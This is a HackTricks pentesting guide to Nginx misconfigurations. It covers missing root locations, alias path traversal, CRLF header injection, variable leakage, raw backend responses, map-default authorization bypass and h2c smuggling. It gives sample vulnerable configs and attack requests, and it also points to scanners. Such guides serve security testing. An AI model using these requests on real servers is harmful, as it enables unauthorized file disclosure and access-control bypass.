hacktricks/network-services-pentesting/pentesting-web/nginx.md
2022-12-05 23:29:21 +01:00

14 KiB
Raw Blame History

Nginx

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

Missing root location

server {
        root /etc/nginx;

        location /hello.txt {
                try_files $uri $uri/ =404;
                proxy_pass http://127.0.0.1:8080/;
        }
}

The root directive specifies the root folder for Nginx. In the above example, the root folder is /etc/nginx which means that we can reach files within that folder. The above configuration does not have a location for / (location / {...}), only for /hello.txt. Because of this, the root directive will be globally set, meaning that requests to / will take you to the local path /etc/nginx.

A request as simple as GET /nginx.conf would reveal the contents of the Nginx configuration file stored in /etc/nginx/nginx.conf. If the root is set to /etc, a GET request to /nginx/nginx.conf would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.

Alias LFI Misconfiguration

Inside the Nginx configuration look the "location" statements, if someone looks like:

location /imgs { 
    alias /path/images/ 
}

There is a LFI vulnerability because:

/imgs../flag.txt

Transforms to:

/path/images/../flag.txt

The correct configuration will be:

location /imgs/ { 
    alias /path/images/ 
}

So, if you find some Nginx server you should check for this vulnerability. Also, you can discover it if you find that the files/directories brute force is behaving weird.

More info: https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/

Accunetix tests:

alias../ => HTTP status code 403
alias.../ => HTTP status code 404
alias../../ => HTTP status code 403
alias../../../../../../../../../../../ => HTTP status code 400
alias../ => HTTP status code 403

Unsafe variable use

An example of a vulnerable Nginx configuration is:

location / {
  return 302 https://example.com$uri;
}

The new line characters for HTTP requests are \r (Carriage Return) and \n (Line Feed). URL-encoding the new line characters results in the following representation of the characters %0d%0a. When these characters are included in a request like http://localhost/%0d%0aDetectify:%20clrf to a server with the misconfiguration, the server will respond with a new header named Detectify since the $uri variable contains the URL-decoded new line characters.

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf

Learn more about the risks of CRLF injection and response splitting at https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/.

Any variable

In some cases, user-supplied data can be treated as an Nginx variable. Its unclear why this may be happening, but its not that uncommon or easy to test for as seen in this H1 report. If we search for the error message, we can see that it is found in the SSI filter module, thus revealing that this is due to SSI.

One way to test for this is to set a referer header value:

$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar

We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.

Raw backend response reading

With Nginxs proxy_pass, theres the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that its an HTTP response?

If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx wont understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:

def application(environ, start_response):
   start_response('500 Error', [('Content-Type',
'text/html'),('Secret-Header','secret-info')])
   return [b"Secret info, should not be visible!"]

And with the following directives in Nginx:

http {
   error_page 500 /html/error.html;
   proxy_intercept_errors on;
   proxy_hide_header Secret-Header;
}

proxy_intercept_errors will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a 500 Error which would be intercepted by Nginx.

proxy_hide_header is pretty much self explanatory; it will hide any specified HTTP header from the client.

If we send a normal GET request, Nginx will return:

HTTP/1.1 500 Internal Server Error
Server: nginx/1.10.3
Content-Type: text/html
Content-Length: 34
Connection: close

But if we send an invalid HTTP request, such as:

GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close

We will get the following response:

XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info

Secret info, should not be visible!

merge_slashes set to off

The merge_slashes directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so /// would become /. If Nginx is used as a reverse-proxy and the application thats being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by Danny Robinson and Rotem Bar.

We found 33 Nginx configuration files with merge_slashes set to “off”.

default is not specified for map directive

It looks like common case when map is used for some kind of authorization control. Simplified example could look like:

http {
...
    map $uri $mappocallow {
        /map-poc/private 0;
        /map-poc/secret 0;
        /map-poc/public 1;
    }
...
}
server {
...
    location /map-poc {
        if ($mappocallow = 0) {return 403;}
        return 200 "Hello. It is private area: $mappocallow";
    }
...
}

According to the manual:

default value
sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default
resulting value will be an empty string.

It is easy to forget about default value. So malefactor can bypass this "authorization control" simply accessing a non existent case inside /map-poc like https://targethost.com/map-poc/another-private-area.

DNS Spoofing Nginx

According to this post: http://blog.zorinaq.com/nginx-resolver-vulns/ It might be possible to spoof DNS records to Nginx if you know the DNS server Nginx is using (and you can intercept somehow the communication, so this is not valid if 127.0.0.1 is used) and the domain it's asking.

Nginx can specify a DNS server to use with:

resolver     8.8.8.8;

proxy_pass and internal directives

The proxy_pass directive can be used to redirect internally requests to other servers internal or external.
The internal directive is used to make it clear to Nginx that the location can only be accessed internally.

The use of these directives isn't a vulnerability but you should check how are them configured.

proxy_set_header Upgrade & Connection

If the nginx server is configured to pass the Upgrade and Connection headers an h2c Smuggling attack could be performed to access protected/internal endpoints.

{% hint style="danger" %} This vulnerability would allow an attacker to stablish a direct connection with the proxy_pass endpoint (http://backend:9999 in this case) that whose content is not going to be checked by nginx. {% endhint %}

Example of vulnerable configuration to steal /flag from here:

server {
    listen       443 ssl;
    server_name  localhost;

    ssl_certificate       /usr/local/nginx/conf/cert.pem;
    ssl_certificate_key   /usr/local/nginx/conf/privkey.pem;

    location / {
     proxy_pass http://backend:9999;
     proxy_http_version 1.1;
     proxy_set_header Upgrade $http_upgrade;
     proxy_set_header Connection $http_connection;
    }

    location /flag {
     deny all;
    }

{% hint style="warning" %} Note that even if the proxy_pass was pointing to a specific path such as http://backend:9999/socket.io the connection will be stablished with http://backend:9999 so you can contact any other path inside that internal endpoint. So it doesn't matter if a path is specified in the URL of proxy_pass. {% endhint %}

Try it yourself

Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!

https://github.com/detectify/vulnerable-nginx

Static Analyzer tools

GIXY

Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.

Nginxpwner

Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.

References

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥